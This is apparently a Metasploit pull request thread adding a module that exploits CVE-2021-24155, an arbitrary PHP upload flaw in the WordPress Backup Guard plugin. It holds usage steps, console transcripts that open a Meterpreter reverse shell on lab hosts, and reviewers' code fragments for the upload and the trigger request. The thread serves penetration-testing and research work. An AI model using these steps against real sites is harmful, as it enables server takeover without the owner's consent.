[CVE-2021-24155] Wordpress Plugin Backup Guard < 1.6.0 - Authenticated Remote Code Execution
rapid7/metasploit-framework pull request #15402
Opened 2021-07-08 14:57 UTC by Hakyac

## Vulnerable Application

### Description

This module allows an attacker with a privileged Wordpress account to launch a reverse shell
due to an arbitrary file upload vulnerability in Wordpress plugin Backup Guard < 1.6.0.
This is due to an incorrect check of the uploaded file extension which should be of SGBP type.
Then, the uploaded payload can be triggered by a call to `/wp-content/uploads/backup-guard/my_payload.php`

### Installation

You can easily install Wordpress with Docker as explained [there]
(https://upcloud.com/community/tutorials/wordpress-with-docker/).
Then, you can download a vulnerable version of Backup Guard plugin from [there]
(https://downloads.wordpress.org/plugin/backup.1.5.8.zip)
and install it on your Wordpress website through the plugin page : Add New > Upload Plugin > Browse...

## Verification Steps

List the steps needed to make sure this thing works

1. Start `msfconsole`
2. `use exploit/multi/http/wordpress_plugin_backup_guard_rce`
3. `set USERNAME <admin_username>`
4. `set PASSWORD <admin_password>`
5. `set TARGETURI <base_path_rconfig>` if the base path of the Wordpress website is different from `/`
6. `check` to check if the targeted Wordpress website is vulnerable
7. `run` the module to exploit the vulnerability and start a reverse shell

## Options

### USERNAME

Set the USERNAME of your admin account.

### PASSWORD

Set the PASSWORD of your admin account.

## Scenarios

This module was successfully tested on Debian 10 with Wordpress 5.7.2 and Backup Guard 1.5.8.
See the following output :

```
msf6 > use wordpress_plugin_backup_guard_rce
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(wordpress_plugin_backup_guard_rce) > set username admin
username => admin
msf6 exploit(wordpress_plugin_backup_guard_rce) > set password your_best_password
password => your_best_password
msf6 exploit(wordpress_plugin_backup_guard_rce) > set rhosts 192.168.37.1
rhosts => 192.168.37.1
msf6 exploit(wordpress_plugin_backup_guard_rce) > run

[*] Started reverse TCP handler on 192.168.37.133:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] Version 1.5.8 of plugin Backup Guard found !
[+] The target is vulnerable. This version of Backup Guard is vulnerable !
[*] Uploading file 'fsygw.php' containing the payload...
[*] Triggering the payload ...
[*] Sending stage (39282 bytes) to 192.168.37.1
[*] Meterpreter session 1 opened (192.168.37.133:4444 -> 192.168.37.1:52688) at 2021-07-08 16:44:01 +0200

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : 217a92584fbf
OS          : Linux 217a92584fbf 4.19.0-17-amd64 #1 SMP Debian 4.19.194-2 (2021-06-21) x86_64
Meterpreter : php/linux
```

2021-07-09 14:36 UTC, h00die requested changes
I abandoned the review after a few lines.

There is a Wordpress specific library that may simplify this code A LOT.
For instance:

1. login functionality: https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/remote/http/wordpress/login.rb
2. finding plugin version from readme (may or may not be applicable): https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/remote/http/wordpress/version.rb#L50

Have a look through the library and see what you can do to simplify some code

2021-07-09 14:36 UTC, h00die commented on modules/exploits/multi/http/wordpress_plugin_backup_guard_rce.rb
> +          ],
https://wpscan.com/vulnerability/d442acac-4394-45e4-b6bb-adf4a40960fb shows Nguyen Van Khanh as another researcher, perhaps they should be added as well.

2021-07-09 14:36 UTC, h00die commented on modules/exploits/multi/http/wordpress_plugin_backup_guard_rce.rb
> +          ],
https://wpscan.com/vulnerability/d442acac-4394-45e4-b6bb-adf4a40960fb

https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=2473510%40backup&old=2472212%40backup&sfp_email=&sfph_mail=

2021-07-09 14:36 UTC, h00die commented on modules/exploits/multi/http/wordpress_plugin_backup_guard_rce.rb
> +    r = send_request_cgi({
I would include this check: https://github.com/rapid7/metasploit-framework/pull/14578/files#diff-2b1f158335a2322c56e4f747884ec66c7421bb9e25508d270338f6e298749df3R52-R55

2021-07-09 14:36 UTC, h00die commented on modules/exploits/multi/http/wordpress_plugin_backup_guard_rce.rb
> +          Then, the uploaded payload can be triggered by a call to `/wp-content/uploads/backup-guard/my_payload.php`
it looks like you randomized the name, so i assume `my_payload` is no longer true

2021-07-12 08:13 UTC, Hakyac commented on modules/exploits/multi/http/wordpress_plugin_backup_guard_rce.rb
> +          Then, the uploaded payload can be triggered by a call to `/wp-content/uploads/backup-guard/my_payload.php`
`my_payload` was just to indicate that it was a payload file and not because it is actually the file name.

2021-07-12 08:29 UTC, Hakyac commented on modules/exploits/multi/http/wordpress_plugin_backup_guard_rce.rb
> +    r = send_request_cgi({
Added

2021-07-12 08:34 UTC, Hakyac commented on modules/exploits/multi/http/wordpress_plugin_backup_guard_rce.rb
> +          ],
Added

2021-07-12 08:40 UTC, Hakyac commented
Hello ! 
I made various changes with the help of the Wordpress lib you mentioned. It would have been great if that lib had been mentioned in the Metasploit documentation too.
Feel free to give me other suggestions ;)

2021-07-12 10:18 UTC, Hakyac commented
By the way, I don't find that [module](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/remote/http/wordpress/version.rb#L50) very accurate as it looks for a `readme.txt` file, which can be missing, and if it is the case it will return a general answer probably like `Cannot reliably check exploitability. Response code=404`. I think it is better to look at the plugin list where every installed plugin is.

2021-07-19 14:53 UTC, space-r7 reviewed
Left some comments on a few minor things. One additional suggestion is to look into using `register_file_for_cleanup` in the `Msf::Exploit::FileDropper` mixin to delete the payload once the exploit is finished.

2021-07-19 14:53 UTC, space-r7 commented on modules/exploits/multi/http/wp_plugin_backup_guard_rce.rb
> +    datastore['WPCHECK'] = true
This option doesn't seem to be used anywhere, so I think it could be removed. Also, datastore option values should never be set this way. They should either have a default value set via `register_options()` or the value should be modified via the user of this module.

```suggestion
```

2021-07-19 14:53 UTC, space-r7 commented on modules/exploits/multi/http/wp_plugin_backup_guard_rce.rb
> +      fail_with(Failure::Unreachable, 'Server not online or not detected as wordpress')
The `check()` method should always return a `CheckCode`. Using `fail_with()` terminates execution of the module, so this should be replaced with a `CheckCode` instead. `CheckCode::Safe` is probably the most applicable check code to use here.

2021-07-19 14:53 UTC, space-r7 commented on modules/exploits/multi/http/wp_plugin_backup_guard_rce.rb
> +      CheckCode::Unknown('The admin credentials given are wrong !')
The `wordpress_and_online?()` call has succeeded at this point, so `CheckCode::Detected` would be best here:

```suggestion
      CheckCode::Detected('Authentication to Wordpress failed.')
```

2021-07-19 14:53 UTC, space-r7 commented on modules/exploits/multi/http/wp_plugin_backup_guard_rce.rb
> +    r.body.to_s.match(/&token=(\h+)/)[1]
The call to `match()` could return nil, so that value should be checked before indexing the `MatchData` returned

```
 :007 > str.match(/&token=(\h+)/)[1]
...
(irb):7:in `<main>': undefined method `[]' for nil:NilClass (NoMethodError)
```

2021-07-19 14:53 UTC, space-r7 commented on modules/exploits/multi/http/wp_plugin_backup_guard_rce.rb
> +    end
Calling `fail_with()` first gets rid of a few lines:

```suggestion
    fail_with(Failure::UnexpectedReply, "Wasn't able to upload the payload file") unless r&.code == 200

    print_status('Triggering the payload ...')
    send_request_cgi(
      'method' => 'GET',
      'cookie' => cookie,
      'uri' => normalize_uri(target_uri.path, "/wp-content/uploads/backup-guard/#{payload_name}.php")
    ) 
```

2021-07-19 14:53 UTC, space-r7 commented on modules/exploits/multi/http/wp_plugin_backup_guard_rce.rb
> +    fail_with(Failure::UnexpectedReply, "Didn't success to retrieve the Backup Guard token") unless token
```suggestion
    fail_with(Failure::UnexpectedReply, "Failed to retrieve the Backup Guard token") unless token
```

2021-07-20 07:27 UTC, Hakyac commented on modules/exploits/multi/http/wp_plugin_backup_guard_rce.rb
> +      CheckCode::Unknown('The admin credentials given are wrong !')
You're right :)

2021-07-20 20:20 UTC, space-r7 commented
Tested on plugin version `1.5.8`, and the module worked as intended:

```
msf6 > use exploit/multi/http/wp_plugin_backup_guard_rce 
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_plugin_backup_guard_rce) > set rhost 192.168.37.145
rhost => 192.168.37.145
msf6 exploit(multi/http/wp_plugin_backup_guard_rce) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf6 exploit(multi/http/wp_plugin_backup_guard_rce) > set username space
username => space
msf6 exploit(multi/http/wp_plugin_backup_guard_rce) > set password password
password => password
msf6 exploit(multi/http/wp_plugin_backup_guard_rce) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Uploading file 'tncag.php' containing the payload...
[*] Triggering the payload ...
[*] Sending stage (39282 bytes) to 192.168.37.145
[+] Deleted tncag.php
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.145:50714) at 2021-07-20 15:13:54 -0500

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 5.8.0-59-generic #66~20.04.1-Ubuntu SMP Thu Jun 17 11:14:10 UTC 2021 x86_64
Meterpreter : php/linux
meterpreter >
```

Currently, there's a mismatch between the module file name and the documentation file name. I'll go ahead, fix that, and then get this landed, thanks!

2021-07-20 20:55 UTC, merged

2021-07-20 20:56 UTC, space-r7 commented
## Release Notes

This adds a module that exploits an authenticated file upload vulnerability in the Wordpress plugin, Backup Guard. For versions below `v1.6.0`, the plugin permits the upload of arbitrary php code due to insufficient checks on the file format. Once the file is uploaded, code execution can be achieved by requesting the file, located under the `/wp-content/uploads/backup-guard` directory.

2021-07-21 07:04 UTC, Hakyac commented
Thanks for having merged this module !